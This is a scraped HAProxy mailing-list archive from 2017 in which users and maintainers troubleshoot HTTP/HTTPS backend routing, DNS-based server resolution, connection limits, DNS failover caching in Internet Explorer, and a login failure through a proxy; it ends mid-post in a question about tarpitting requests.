>> cannot seem to figure it out so am hoping someone can point me in the right
>> direction. I have different backend proxy servers (squid) setup to handle
>> specifically HTTP and HTTPS traffic but cannot figure out how to tell
>> haproxy to tell the difference and send appropriately.
>>
>> For example, I have
>>
>> frontend proxy_servers
>> backend http_proxies
>> backend https_proxies
>>
>> how can I tell frontend to send all http traffic to backend http_proxies
>> and all https traffic to https_backend? I have tried using dst_port 443 and
>> the acl https ssl_fc but nothing seems to distinguish https traffic.
>>
>
> Well, it should work. Send a copy of your config to see what's wrong in
> it.
>
> Olivier
>
>
>
>>
>> TIA...
>>
>
>
Here is an example, it continues to direct all https traffic to the web
proxy and not the streaming media one.

frontend HTPL_PROXY
bind10.1.4.105:8181 name 10.1.4.105:8181
modehttp
log global
option  http-server-close
option  forwardfor
acl https ssl_fc
http-request set-header X-Forwarded-Proto http if !https
http-request set-header X-Forwarded-Proto https if https
maxconn 9
timeout client  1
option tcp-smart-accept
acl is_youtube  hdr_sub(host) -i youtube.com
acl is_netflix  hdr_sub(host) -i netflix.com
acl is_nflixvideo   hdr_sub(host) -i nflxvideo.net
acl is_googlevideo  hdr_sub(host) -i googlevideo.com
acl is_google   hdr_sub(host) -i google.com
acl is_pandora  hdr_sub(host) -i pandora.com
acl is_httpsdst_port eq 443
use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_youtube
use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_netflix
use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_nflixvideo
use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_googlevideo
use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_pandora
use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_https
default_backend HTPL_WEB_PROXY_http_ipvANY

Obviously dst_port 443 method can not work since you are listening on port
8181. Since both protocols are on same port you can try in tcp mode:

mode tcp
option tcplog
bind *:8181

tcp-request inspect-delay 5s
acl is_ssl req.ssl_hello_type 1


Re: How to forward HTTP / HTTPS to different backend proxy servers

2017-07-02 Thread Igor Cicimov
On 3 Jul 2017 6:47 am, "Daren Sefcik"  wrote:

On Sat, Jul 1, 2017 at 4:39 PM, Igor Cicimov  wrote:

>
>
> On 29 Jun 2017 2:46 am, "Daren Sefcik"  wrote:
>
> On Wed, Jun 28, 2017 at 8:12 AM, Olivier Doucet 
> wrote:
>
>> Hi,
>>
>>
>> 2017-06-28 16:47 GMT+02:00 Daren Sefcik :
>>
>>> Hi, I have searched for an answer to this and tried several things but
>>> cannot seem to figure it out so am hoping someone can point me in the right
>>> direction. I have different backend proxy servers (squid) setup to handle
>>> specifically HTTP and HTTPS traffic but cannot figure out how to tell
>>> haproxy to tell the difference and send appropriately.
>>>
>>> For example, I have
>>>
>>> frontend proxy_servers
>>> backend http_proxies
>>> backend https_proxies
>>>
>>> how can I tell frontend to send all http traffic to backend http_proxies
>>> and all https traffic to https_backend? I have tried using dst_port 443 and
>>> the acl https ssl_fc but nothing seems to distinguish https traffic.
>>>
>>
>> Well, it should work. Send a copy of your config to see what's wrong in
>> it.
>>
>> Olivier
>>
>>
>>
>>>
>>> TIA...
>>>
>>
>>
> Here is an example, it continues to direct all https traffic to the web
> proxy and not the streaming media one.
>
> frontend HTPL_PROXY
>   bind10.1.4.105:8181 name 10.1.4.105:8181
>   modehttp
>   log global
>   option  http-server-close
>   option  forwardfor
>   acl https ssl_fc
>   http-request set-header X-Forwarded-Proto http if !https
>   http-request set-header X-Forwarded-Proto https if https
>   maxconn 9
>   timeout client  1
>   option tcp-smart-accept
>   acl is_youtube  hdr_sub(host) -i youtube.com
>   acl is_netflix  hdr_sub(host) -i netflix.com
>   acl is_nflixvideo   hdr_sub(host) -i nflxvideo.net
>   acl is_googlevideo  hdr_sub(host) -i googlevideo.com
>   acl is_google   hdr_sub(host) -i google.com
>   acl is_pandora  hdr_sub(host) -i pandora.com
>   acl is_httpsdst_port eq 443
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_youtube
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_netflix
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_nflixvideo
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_googlevideo
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_pandora
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_https
>   default_backend HTPL_WEB_PROXY_http_ipvANY
>
> Obviously dst_port 443 method can not work since you are listening on port
> 8181. Since both protocols are on same port you can try in tcp mode:
>
> mode tcp
> option tcplog
> bind *:8181
>
> tcp-request inspect-delay 5s
> acl is_ssl req.ssl_hello_type 1
>
>

Thank you, I have tried that with the below config and it still sends all
traffic to the default backend instead of my ssl backend, any other ideas?

frontend HTPL_PROXY
bind10.1.4.105:8181 name 10.1.4.105:8181

modetcp
log global
maxconn 9
timeout client  1
option tcp-smart-accept
tcp-request inspect-delay 5s
acl is_ssl  req.ssl_hello_type 1
use_backend HTPL_SSL_PROXY_tcp_ipvANY  if  is_ssl
default_backend HTPL_WEB_PROXY_tcp_ipvANY

Only explenation i can see is that no ssl traffik is hitting haproxy at
least not on port 8181


Re: How to forward HTTP / HTTPS to different backend proxy servers

2017-07-02 Thread Igor Cicimov
On 3 Jul 2017 8:35 am, "Igor Cicimov" 
wrote:



On 3 Jul 2017 6:47 am, "Daren Sefcik"  wrote:

On Sat, Jul 1, 2017 at 4:39 PM, Igor Cicimov  wrote:

>
>
> On 29 Jun 2017 2:46 am, "Daren Sefcik"  wrote:
>
> On Wed, Jun 28, 2017 at 8:12 AM, Olivier Doucet 
> wrote:
>
>> Hi,
>>
>>
>> 2017-06-28 16:47 GMT+02:00 Daren Sefcik :
>>
>>> Hi, I have searched for an answer to this and tried several things but
>>> cannot seem to figure it out so am hoping someone can point me in the right
>>> direction. I have different backend proxy servers (squid) setup to handle
>>> specifically HTTP and HTTPS traffic but cannot figure out how to tell
>>> haproxy to tell the difference and send appropriately.
>>>
>>> For example, I have
>>>
>>> frontend proxy_servers
>>> backend http_proxies
>>> backend https_proxies
>>>
>>> how can I tell frontend to send all http traffic to backend http_proxies
>>> and all https traffic to https_backend? I have tried using dst_port 443 and
>>> the acl https ssl_fc but nothing seems to distinguish https traffic.
>>>
>>
>> Well, it should work. Send a copy of your config to see what's wrong in
>> it.
>>
>> Olivier
>>
>>
>>
>>>
>>> TIA...
>>>
>>
>>
> Here is an example, it continues to direct all https traffic to the web
> proxy and not the streaming media one.
>
> frontend HTPL_PROXY
>   bind10.1.4.105:8181 name 10.1.4.105:8181
>   modehttp
>   log global
>   option  http-server-close
>   option  forwardfor
>   acl https ssl_fc
>   http-request set-header X-Forwarded-Proto http if !https
>   http-request set-header X-Forwarded-Proto https if https
>   maxconn 9
>   timeout client  1
>   option tcp-smart-accept
>   acl is_youtube  hdr_sub(host) -i youtube.com
>   acl is_netflix  hdr_sub(host) -i netflix.com
>   acl is_nflixvideo   hdr_sub(host) -i nflxvideo.net
>   acl is_googlevideo  hdr_sub(host) -i googlevideo.com
>   acl is_google   hdr_sub(host) -i google.com
>   acl is_pandora  hdr_sub(host) -i pandora.com
>   acl is_httpsdst_port eq 443
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_youtube
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_netflix
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_nflixvideo
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_googlevideo
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_pandora
>   use_backend HTPL_STREAMING_MEDIA_PROXY_http_ipvANY  if  is_https
>   default_backend HTPL_WEB_PROXY_http_ipvANY
>
> Obviously dst_port 443 method can not work since you are listening on port
> 8181. Since both protocols are on same port you can try in tcp mode:
>
> mode tcp
> option tcplog
> bind *:8181
>
> tcp-request inspect-delay 5s
> acl is_ssl req.ssl_hello_type 1
>
>

Thank you, I have tried that with the below config and it still sends all
traffic to the default backend instead of my ssl backend, any other ideas?

frontend HTPL_PROXY
bind10.1.4.105:8181 name 10.1.4.105:8181

modetcp
log global
maxconn 9
timeout client  1
option tcp-smart-accept
tcp-request inspect-delay 5s
acl is_ssl  req.ssl_hello_type 1
use_backend HTPL_SSL_PROXY_tcp_ipvANY  if  is_ssl
default_backend HTPL_WEB_PROXY_tcp_ipvANY

Only explenation i can see is that no ssl traffik is hitting haproxy at
least not on port 8181

Or the ip it is bind to


Re: How to forward HTTP / HTTPS to different backend proxy servers

2017-07-02 Thread Igor Cicimov
On Mon, Jul 3, 2017 at 9:44 AM, Michael Ezzell  wrote:

>
>
> On Jul 2, 2017 19:15, "Daren Sefcik"  wrote:
>
>
> Most of the traffic is ssl, for example gmail, facebook, pandora all force
> https.
>
>
> I'm going to go out on a limb and suggest that *none* of the traffic is
> SSL in any sense that is meaningful from HAProxy's perspective.
>
> What do the HTTPS requests look like in the HAProxy logs?  Aren't they
> CONNECT requests?
>

​I was going to go even further and ask for tcpdump capture on the haproxy
port :-)
 ​


Re: How to forward HTTP / HTTPS to different backend proxy servers

2017-07-02 Thread Igor Cicimov
On Mon, Jul 3, 2017 at 10:38 AM, Daren Sefcik 
wrote:

>
> On Sun, Jul 2, 2017 at 4:44 PM, Michael Ezzell  wrote:
>
>>
>>
>> On Jul 2, 2017 19:15, "Daren Sefcik"  wrote:
>>
>>
>> Most of the traffic is ssl, for example gmail, facebook, pandora all
>> force https.
>>
>>
>> I'm going to go out on a limb and suggest that *none* of the traffic is
>> SSL in any sense that is meaningful from HAProxy's perspective.
>>
>> What do the HTTPS requests look like in the HAProxy logs?  Aren't they
>> CONNECT requests?
>>
>>
> yep, pretty much..I just need some help to figure out how to make it
> work
>
> example log entries for https and http, you can see how the "443" goes to
> one backenad and the regular http "GET" request goes to another..but this
> is not consistent and I know there has to be a better way..
>
> HTPL_PROXY HTPL_SSL_PROXY_http_ipvANY/HTPL-PROXY-03_10.1.4.180
> 0/0/0/22/10075 200 525 - - cD-- 124/124/103/103/0 0/0 "CONNECT
> caltopo.com:443 HTTP/1.1"
>
> HTPL_PROXY HTPL_WEB_PROXY_http_ipvANY/HTPL-PROXY-04_10.1.4.181
> 92/0/0/1/93 403 4309 - -  126/126/10/11/0 0/0 "GET
> http://i2.wp.com/n4.nabble.com/images/avatar100.png HTTP/1.1"
>
>
> TIA for any help with this..!
>

​Is it possible that *some* of the clients have issues talking to the
haproxy over ssl? You say in case of ssl it is not 100% successful but what
does that mean? How does this manifest? Can you track the ssl request from
particular client ending up on the http backend?
 ​


DNS resolver for backend with server/service with multiple IP's

2017-07-03 Thread Igor Cicimov
Hi,

If I remember correctly, there was a feature that was talked about on the
mailing list, and was said it should make it into 1.7, where the
dns-resolver can work with dns records that return multiple IP's, like lets
say:

root@ip-10-77-0-94:~# dig +short tomcat.service.consul A
10.77.4.234
10.77.3.227

and account for all records returned (till 1.6 the resolver was grabbing
only the first IP returned) in terms of load balancing. So I'm testing this
with 1.7.7 like this:

​​
server tomcats tomcat.service.consul:8080 check resolvers dns_resolvers
resolve-prefer ipv4

​instead of:

​​server tomcat1 10.77.4.234:8080 check resolvers dns_resolvers
resolve-prefer ipv4
​server tomcat2 10.77.3.227:8080 check resolvers dns_resolvers
resolve-prefer ipv4

​to load balance between all ip's, but seeing in the logs messages like
this:

Jul  3 17:13:15 ip-10-77-0-94 haproxy[22902]: tomcats/tomcats changed its
IP from 10.77.3.227 to 10.77.4.234 by dns_resolvers/dns0.

​so does this mean the feature is not implemented yet?​

​Thanks,
Igor​


Re: DNS resolver for backend with server/service with multiple IP's

2017-07-03 Thread Igor Cicimov
On Mon, Jul 3, 2017 at 11:52 PM, Baptiste  wrote:

>
>
> On Mon, Jul 3, 2017 at 9:32 AM, Igor Cicimov  com> wrote:
>
>> Hi,
>>
>> If I remember correctly, there was a feature that was talked about on the
>> mailing list, and was said it should make it into 1.7, where the
>> dns-resolver can work with dns records that return multiple IP's, like lets
>> say:
>>
>> root@ip-10-77-0-94:~# dig +short tomcat.service.consul A
>> 10.77.4.234
>> 10.77.3.227
>>
>> and account for all records returned (till 1.6 the resolver was grabbing
>> only the first IP returned) in terms of load balancing. So I'm testing this
>> with 1.7.7 like this:
>>
>> ​​
>> server tomcats tomcat.service.consul:8080 check resolvers dns_resolvers
>> resolve-prefer ipv4
>>
>> ​instead of:
>>
>> ​​server tomcat1 10.77.4.234:8080 check resolvers dns_resolvers
>> resolve-prefer ipv4
>> ​server tomcat2 10.77.3.227:8080 check resolvers dns_resolvers
>> resolve-prefer ipv4
>>
>> ​to load balance between all ip's, but seeing in the logs messages like
>> this:
>>
>> Jul  3 17:13:15 ip-10-77-0-94 haproxy[22902]: tomcats/tomcats changed its
>> IP from 10.77.3.227 to 10.77.4.234 by dns_resolvers/dns0.
>>
>> ​so does this mean the feature is not implemented yet?​
>>
>> ​Thanks,
>> Igor​
>>
>>
>
> Hi Igor,
>
> For now, you can't replace a couple of "hard coded" server lines by a
> single server line with DNS enabled.
> The second case will make you have in the end a single server in the
> backend.
>
> HAProxy 1.8 will bring the features you need:
> 1. use the server-template line to configure 2 servers (or more) in
> HAProxy while using a single configuration line
> 2. a cache of the DNS response has been implemented and each time a record
> is used, it is internally moved to the bottom of the list, so all IPs will
> be used as best as possible
>
> Example with server-template to apply to your example:
>   server-template tomcat 2 tomcat.service.consul:8080 check resolvers
> dns_resolvers resolve-prefer ipv4
>
> I would also recommend to set 'init-addr none' to prevent HAProxy from
> using libc at configuration parsing. I saw some deployments where the host
> below HAProxy was not be able to resolve an IP address from a consul
> endpoint.
>
> Baptiste
>

​That's awesome, thanks Baptiste! Also appreciate the valuable input
regarding consul. So excited can't wait to try this ​the moment 1.8 shows
up in the ppa.

Cheers,
Igor


Re: Reg: HAProxy 1.6.12 on RHEL7.2 (MAXCONN in FRONT-END/LISTEN BLOCK)

2017-07-03 Thread Igor Cicimov
On Tue, Jul 4, 2017 at 1:34 PM, Velmurugan Dhakshnamoorthy <
dvel@gmail.com> wrote:

> Thanks much for detailed explanation.
>
> Once the limit of 100 sessions are reached, note we are talking about *100
> sessions in Weblogic* and *NOT 100 connections to the backend*, what is
> the Weblogic server going to do? We need to understand what happens on
> Weblogic side once the 101st session is accepted. You get error 500
> straight away or something else happens? Maybe nothing and the request gets
> dropped after sitting in the Weblogic queue for some time?
>
> [Vel] once the limit(100) is reached in weblogic, 101 user will receive
> error 500, OOM (OutOfMeory) error in weblogic back-end.when there is OOM
> occurs, even connected users responses will be impacted.
>
> Regards,
> Vel
>
>
​Well, the biggest issue you have is that number or connections is not the
same as number of sessions. Lets say you have reached your 100 connections
limit which corresponds to 100 sessions in WL and one client's browser
starts closing its connections. For HAP the number of connections will drop
below 100, lets say to 96, and it is possible that in that moment a new
user gets connected which will cause WL to create a new 101th session and
crash. So how are you going to solve this dependency between connections on
the HAP side and sessions in the WL side?

Another thing is that modern browsers can open up to 6-7 connections to a
single domain name which potentially leaves you with less than ​20 users
during the overload period with the limitation of 100 connections in HAP.
Also depending on the users activity, every time the user is active WL will
restart the session timer to 20 min, you might end up with less than 20
users connected for a long long time.


Re: HAProxy failover - DNS change cached by IE for a long time

2017-07-07 Thread Igor Cicimov
On 28 Jun 2017 12:45 am, "Norman Branitsky" 
wrote:

Using the NS1 managed DNS service, I monitor the health of 2 HAProxy 1.7.7
servers defined as peers.

Not related to the op but 1.7.8 got just released with some important fixes.

NS1 checks the health of the HAProxy servers every 30 seconds.

This is too long for production dns load balancing should be 10 seconds at
least if allowed by the provider.

If haproxy1 fails to respond, NS1 changes the DNS response to point to
haproxy2.

When haproxy1 comes back online, NS1 reverts the DNS response to haproxy1.

NS1 checks the health of my Java application server every 60 seconds.

NS1 DNS records looks like this:

haproxy1 A record

haproxy2 A record

tm1  CNAME record “Dynamic” – NS1 “filter” returns the first in the
list of all health haproxy servers

vr   CNAME record pointing to tm1 – name of the Java application server



Not clear what is the TTL of the records though? Is it equal to the health
check interval for each? In that case shouldn't the times of haproxy and
the app be same ie 30 seconds? You can potentially hit the scenario where
the client caches the dns for 60 seconds and haproxy failed over (tm1
changed) 30 seconds earlier.

If I connect to my Java application with Chrome or Firefox, I often don’t
notice the haproxy DNS failover.

If I do get a connection error, it almost always reconnects within seconds.

I don’t lose my session.



If I connect to my Java application with IE (only tested IE10 mode so far),
the haproxy DNS failover cause a DNS error.

This error won’t clear for at least 20 minutes.

Is this the session life time? What does it have to do with dns i wonder?
What is the dns cache ttl in ie10 set to (i never use ie so no idea)? And
is it tunable?

If I open a new tab I connect instantly.

Since the JSESSIONID cookie is still available, I’m still logged in but
obviously not on the same data entry page.

What can I do to kick IE in the head and cause it to refresh its DNS cache?
It doesn’t seem to respect the TTL value.

Nothing. Common problem with dns load balancing if the client doesn't
respect the ttl you can't do anything about it. Although one problem I see
is the single record NS1 returns for your app dns. Usually you want it to
return both haproxy A records in round-robin order so (some) clients can
try the second one if the first one fails before they make a new dns query.
Never used NS1 so not sure if this functionality exists at all. Also is NS1
always returning the same A record out of the two (looks like the case if
it uses sorting)? In that case all clients will connect to the same haproxy
(not sure if you want/need this active-passive setup though).

Norman




*Norman Branitsky *Cloud Architect

MicroPact

(o) 416.916.1752

(c) 416.843.0670

(t) 1-888-232-0224 x61752

www.micropact.com

Think it > Track it > Done


RE: HAProxy failover - DNS change cached by IE for a long time

2017-07-08 Thread Igor Cicimov
On 8 Jul 2017 2:58 am, "Norman Branitsky" 
wrote:

I changed the TTL on my application’s DNS entry, to no avail.

Try tuning these parameters in jvm, assuming Sun oracle jdk here:

-Dsun.net.inetaddr.ttl=value
-Dsun.net.inetaddr.negative.ttl=value

If security manager is installled System wide, by adding a line containing

networkaddress.cache.ttl=value

in $JAVA_HOME/jre/lib/security/java.security

JDK 1.6, 1.7 & 1.8 default cache setting:

30 secs (When a security manager is not set)
-1   (When a security manager is set)

* DNS Cache is refreshed every 30 seconds

So adjust the value to some low value of 10 sec say.

Once the DNS entry updates to point to the 2nd HAProxy server,

IE displays it’s dnserror.htm page:

“This page can’t be displayed”.

Copy/Paste the URL into a new tab and the page renders immediately.

The original tab continues to display the dnserror page –

probably for 20 minutes.



*From:* Norman Branitsky [mailto:norman.branit...@micropact.com]
*Sent:* June-27-17 10:44 AM
*To:* haproxy@formilux.org
*Subject:* HAProxy failover - DNS change cached by IE for a long time



This sender failed our fraud detection checks and may not be
 who they appear to be. Learn about spoofing


Feedback 

Using the NS1 managed DNS service, I monitor the health of 2 HAProxy 1.7.7
servers defined as peers.

NS1 checks the health of the HAProxy servers every 30 seconds.

If haproxy1 fails to respond, NS1 changes the DNS response to point to
haproxy2.

When haproxy1 comes back online, NS1 reverts the DNS response to haproxy1.

NS1 checks the health of my Java application server every 60 seconds.

NS1 DNS records looks like this:

haproxy1 A record

haproxy2 A record

tm1  CNAME record “Dynamic” – NS1 “filter” returns the first in the
list of all health haproxy servers

vr   CNAME record pointing to tm1 – name of the Java application server



If I connect to my Java application with Chrome or Firefox, I often don’t
notice the haproxy DNS failover.

If I do get a connection error, it almost always reconnects within seconds.

I don’t lose my session.



If I connect to my Java application with IE (only tested IE10 mode so far),
the haproxy DNS failover cause a DNS error.

This error won’t clear for at least 20 minutes.

If I open a new tab I connect instantly.

Since the JSESSIONID cookie is still available, I’m still logged in but
obviously not on the same data entry page.

What can I do to kick IE in the head and cause it to refresh its DNS cache?
It doesn’t seem to respect the TTL value.



Norman




*Norman Branitsky *Cloud Architect

MicroPact

(o) 416.916.1752

(c) 416.843.0670

(t) 1-888-232-0224 x61752

www.micropact.com

Think it > Track it > Done


RE: HAProxy failover - DNS change cached by IE for a long time

2017-07-08 Thread Igor Cicimov
On 9 Jul 2017 12:20 pm, "Norman Branitsky" 
wrote:

Thanks for the responses.

shouldbe q931, in a private email to me, and Baptiste, both suggested I not
use DNS.
Baptiste suggested VRRP and shouldbe q931 suggested something similar using
keepalived.

I replied to shouldbe q931 thus:



As far as I know, keepalived requires a separate network interface
connecting the 2 servers

to manage the heartbeat connection.

In my case, the 2 HAProxy servers are in different Amazon AWS Availability
Zones (Data Centers)

with different network subnets.

I don’t think I can make keepalived work in this configuration.

Of course it can work see
https://icicimov.github.io/blog/high-availability/Keepalived-in-Amazon-VPC-across-availability-zones/

Igor, you suggested 30 seconds was too long for a health check failover.

Unfortunately, that is the minimum setting that NS1 supports.

If your servers are in aws why are you not using Route53 then? It allows
for low dns ttl even lower then 10 sec. It has many advanced options of
load balancing and health checking for sure it is superior compared to NS1.



The reason the NS1 Filter only returns the first healthy HAProxy is that
this configuration has been in place

for quite some time while my HAProxy servers were running version 1.5.

I’m in the process of upgrading all my HAProxy servers to version 1.7.8
with a peers section defined.

If your app does not need sticky sessions you dont need peers setup and you
can start using both haproxies right away. You can also set haproxy to
insert its own cookies and mantain the stickinnes in that way. I've been
using it that way with active-active haproxy servers for ages in AWS with
Route53 dns health checks (min hc interval is 10 seconds though and
additonal costs apply) for apps that need sticky sessions.

So I believe I can now safely change the NS1 Filter to round-robin mode.



You’re suggestion to reduce the JVM ttl value sounds interesting.

I’m guessing you think this will force IE to refresh its DNS cache.



Something interesting appeared in my testing.

With haproxy1 and haproxy2 running, I connected to my app using IE.

I then shutdown haproxy1.

After 30 seconds, NS1 performed a DNS failover to haproxy2 and the IE
client complained about no connection.

(In a 2nd tab it connects immediately as usual.)

After about 20 minutes the first tab reconnected.

I then restarted haproxy1.

After 30 seconds, NS1 performed a DNS switch back to haproxy1.

Now the IE client continued to operate correctly!

It’s as if it had seen haproxy1 before so it didn’t complain on the switch
back?!?

Just confirming that returning multiple records to the clients might fix
ie10 issue.
According to this
https://blogs.msdn.microsoft.com/ieinternals/2012/09/26/braindump-dns/ ie10
will cache up to 256 records up to 30min and wil not respect ttl. You need
to change this setting in the windows registry which you can't expect your
costumers to do.



*From:* Igor Cicimov [mailto:ig...@encompasscorporation.com]
*Sent:* July-08-17 9:14 AM
*To:* Norman Branitsky 
*Cc:* HAProxy 
*Subject:* RE: HAProxy failover - DNS change cached by IE for a long time



On 8 Jul 2017 2:58 am, "Norman Branitsky" 
wrote:

I changed the TTL on my application’s DNS entry, to no avail.

Try tuning these parameters in jvm, assuming Sun oracle jdk here:

-Dsun.net.inetaddr.ttl=value
-Dsun.net.inetaddr.negative.ttl=value

If security manager is installled System wide, by adding a line containing

networkaddress.cache.ttl=value

in $JAVA_HOME/jre/lib/security/java.security

JDK 1.6, 1.7 & 1.8 default cache setting:

30 secs (When a security manager is not set)
-1   (When a security manager is set)

* DNS Cache is refreshed every 30 seconds

So adjust the value to some low value of 10 sec say.

Once the DNS entry updates to point to the 2nd HAProxy server,
IE displays it’s dnserror.htm page:
“This page can’t be displayed”.
Copy/Paste the URL into a new tab and the page renders immediately.
The original tab continues to display the dnserror page –
probably for 20 minutes.

*From:* Norman Branitsky [mailto:norman.branit...@micropact.com]
*Sent:* June-27-17 10:44 AM
*To:* haproxy@formilux.org
*Subject:* HAProxy failover - DNS change cached by IE for a long time

This sender failed our fraud detection checks and may not
be who they appear to be. Learn about spoofing
<http://aka.ms/LearnAboutSpoofing>

Feedback <http://aka.ms/SafetyTipsFeedback>

Using the NS1 managed DNS service, I monitor the health of 2 HAProxy 1.7.7
servers defined as peers.

NS1 checks the health of the HAProxy servers every 30 seconds.

If haproxy1 fails to respond, NS1 changes the DNS response to point to
haproxy2.

When haproxy1 comes back online, NS1 reverts the DNS response to haproxy1.

NS1 checks the health of my Java application server every 60 seconds.

NS1 DNS records looks like this:

haproxy1 A record

haproxy2 A record

tm1  CNAME record “Dynamic

Re: Seeking Assistance: HTTP Headers Conf. to Access Web Product

2017-07-19 Thread Igor Cicimov
On Wed, Jul 19, 2017 at 5:29 PM, Coscend@HAProxy <
haproxy.insig...@coscend.com> wrote:

> Attached is the correct HAProxy log output.
>
>
>
> The attachment in the previous post was from an unrelated context.
> Apologies.  Thank you for your assistance.
>
>
>
> *From:* Coscend@HAProxy [mailto:haproxy.insig...@coscend.com]
> *Sent:* Wednesday, July 19, 2017 2:16 AM
> *To:* haproxy@formilux.org
> *Subject:* Seeking Assistance: HTTP Headers Conf. to Access Web Product
>
>
>
> Hello HAProxy Community,
>
>
>
> We are seeking your assistance with the following issue we are facing with
> HAProxy being used as a reverse proxy server.  Your vectors could help us
> learn and identify the cause of our issue and solve it.  Thank you.
>
>
>
> ISSUE
>
> =
>
> We are able to successfully access and run our Web application from
> INTERNALLY, bypassing HAProxy, using  URL.
>
> But, through HAProxy 1.7.8, only the login page of this Web application
> loads.  Upon clicking on login button, nothing happens and we are unable to
> go past it.
>
>
>
> Below inline are the:
>
> [1] HTTP header analysis from browser inspection tool, for both successful
> application run (withOUT HAProxy) and failed run with HAProxy.
>
> Diffs: Set-Cookie header (JSESSIONID), Transfer-Encoding, Accept-encoding,
> expires, p::submit
>
> [2] HAProxy conf. with relevant frontend and backend. – we are using
> modular, multiple files.
>
> [3] HAProxy log (ATTACHED).
>
>
>
>
>
> [1] Browser inspection output:  HTTP Headers
>
> ==
>
> Successful running:  bypassing HAProxy (internally)
>
> -
>
> Request URL:http://< IP:Port>/Product.Name/wicket/bookmarkable/org.apache.
> openmeetings.web.pages.auth.SignInPage?2-1.0-signin-signin-submit
>
> Request Method:POST
>
> Status Code:200
>
> Remote Address:
>
> Referrer Policy:no-referrer-when-downgrade
>
> Response Headers
>
> view source
>
> Ajax-Location:.
>
> Cache-Control:no-cache, no-store
>
> Content-Security-Policy:default-src 'self'; style-src 'self'
> 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval';
>
> Content-Type:text/xml;charset=UTF-8
>
> Date:Mon, 17 Jul 2017 19:36:24 GMT
>
> Expires:Thu, 01 Jan 1970 00:00:00 GMT
>
> Pragma:no-cache
>
> Set-Cookie:JSESSIONID=07E88B37E0F1F42D0BBD319FDC79DB
> D0;path=/;HttpOnly
>
> Strict-Transport-Security:max-age=31536000; includeSubDomains; preload
>
> Transfer-Encoding:chunked
>
> X-Content-Type-Options:nosniff
>
> X-Frame-Options:SAMEORIGIN
>
> X-XSS-Protection:1; mode=block
>
> Request Headers
>
> view source
>
> Accept:application/xml, text/xml, */*; q=0.01
>
> Accept-Encoding:gzip, deflate
>
> Accept-Language:en-US,en;q=0.8
>
> Connection:keep-alive
>
> Content-Length:61
>
> Content-Type:application/x-www-form-urlencoded; charset=UTF-8
>
> Cookie:JSESSIONID=CD59ACAA3BCFE3F4C8A3AEBE77C52BC6
>
> DNT:1
>
> Host:< IP:Port>
>
> Origin:http://
>
> Referer:http:signin;jsessionid=
> CD59ACAA3BCFE3F4C8A3AEBE77C52BC6
>
> User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
> (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
>
> Wicket-Ajax:true
>
> Wicket-Ajax-BaseURL:signin
>
> X-Requested-With:XMLHttpRequest
>
> Query String Parameters
>
> view source
>
> view URL encoded
>
> 2-1.0-signin-signin-submit:
>
> Form Data
>
> view source
>
> view URL encoded
>
> login:<…>
>
> pass:<…>
>
> p::submit:1
>
>
>
>
>
> FAILED LOGIN via HAProxy
>
> ---
>
> Request URL:https:wicket/
> bookmarkable/org.apache.openmeetings.web.pages.auth.
> SignInPage?1-1.2-signin
>
> Request Method:POST
>
> Status Code:400
>
> Remote Address::443
>
> Referrer Policy:no-referrer-when-downgrade
>
> Response Headers
>
> view source
>
> Cache-Control:nocache, no-store
>
> Content-Language:en
>
> Content-Length:800
>
> Content-Security-Policy:default-src 'self'; style-src 'self'
> 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval';
>
> Content-Type:text/html;charset=utf-8
>
> Date:Wed, 19 Jul 2017 06:45:33 GMT
>
> Pragma:no-cache
>
> Referrer-Policy:no-referrer-when-downgrade
>
> Strict-Transport-Security:max-age=31536000; includeSubDomains; preload
>
> X-Content-Type-Options:nosniff
>
> X-Frame-Options:SAMEORIGIN
>
> X-XSS-Protection:1; mode=block
>
> Request Headers
>
> view source
>
> Accept:application/xml, text/xml, */*; q=0.01
>
> Accept-Encoding:gzip, deflate, br
>
> Accept-Language:en-US,en;q=0.8
>
> Connection:keep-alive
>
> Content-Length:45
>
> Content-Type:application/x-www-form-urlencoded; charset=UTF-8
>
> Cookie:JSESSIONID=cc-tt-d~6EE3B690118810FEE7ED4B38E61D9294
>
> DNT:1
>
> Host:
>
> Origin:https://
>
> Referer:https:///Product.Name/signin;jsessionid=
> 6EE3B690118810FEE7ED4B38E61D9294
>
> User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
> (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
>
> Wicket-Ajax:true
>
> Wicket-Ajax-BaseURL:signin
>
> Wicket-FocusedElementId:btn1d9
>
> 

Re: tcp-response content tarpit if hdr(X-Tarpit-This)

2017-07-28 Thread Igor Cicimov
On 28 Jul 2017 5:41 pm, "Charlie Elgholm"  wrote:

Hi Folks,

Either I'm too stupid, or it's because it's Friday

Can you tarpit/reject (or other action) based on a response from the
backend?
You should be able to, right?

Like this:
tcp-response content tarpit/reject if res.hdr(X-Tarpit-This)

Can someone explain this to me? (Free beer.)

I have a fairly complex ruleset on my backend server, written in Oracle
PL/SQL, which monitors Hack- or DoS-attempts, and I would love to tarpit
some requests on the frontend (by haproxy) based on something that happens
on my backend.

As I do now I return a 503 response from the server, and iptable-block
those addresses for a while. But since they see the 503 response they'll
return at a later date and try again. I would like the connection to just
